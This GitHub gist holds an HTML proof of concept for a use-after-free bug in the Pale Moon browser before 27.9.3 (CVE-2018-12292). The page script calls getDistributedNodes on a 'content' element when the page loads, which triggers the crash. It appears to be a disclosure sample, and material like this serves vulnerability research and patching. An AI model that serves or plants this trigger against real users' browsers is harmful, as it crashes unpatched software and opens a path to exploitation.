Created
June 13, 2018 15:12
-
-
Save berkgoksel/bbae795cae748fffe76b93a424a47dc2 to your computer and use it in GitHub Desktop.
Pale Moon Browser < 27.9.3 - Use After Free - Proof of Concept.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- PaleMoon Browser - Proof of Concept --> | |
<!-- Exploit Title: Pale Moon Browser < 27.9.3 - Use After Free - Proof of Concept --> | |
<!-- Date: 13 Jun 2018 --> | |
<!-- Author - Berk Cem Goksel --> | |
<!-- Contact: twitter.com/berkcgoksel || bgoksel.com --> | |
<!-- Vendor Homepage: https://www.palemoon.org/ --> | |
<!-- Software Link: https://www.palemoon.org/palemoon-win32.shtml --> | |
<!-- Version: Versions prior to 27.9.3 (Tested versions: 27.9.0, 27.9.1, 27.9.2) --> | |
<!-- Tested on: Windows 10 --> | |
<!-- Category: Windows Remote Exploit --> | |
<!-- CVE : CVE-2018-12292 --> | |
<html> | |
<head> | |
<style> | |
</style> | |
<script> | |
function SetVariable(fuzzervars, var_name, var_type) { | |
fuzzervars[var_type] = var_name; | |
} | |
function jsfuzzer() { | |
var var_1 = var_2.getDistributedNodes(); | |
SetVariable(var_1, 'NodeList'); | |
} | |
</script> | |
</head> | |
<body onload=jsfuzzer()> | |
<!--beginhtml--> | |
<content id="var_2" loopend="1" default="" max="0" charset="ISO-2022-JP"></content> | |
<!--endhtml--> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment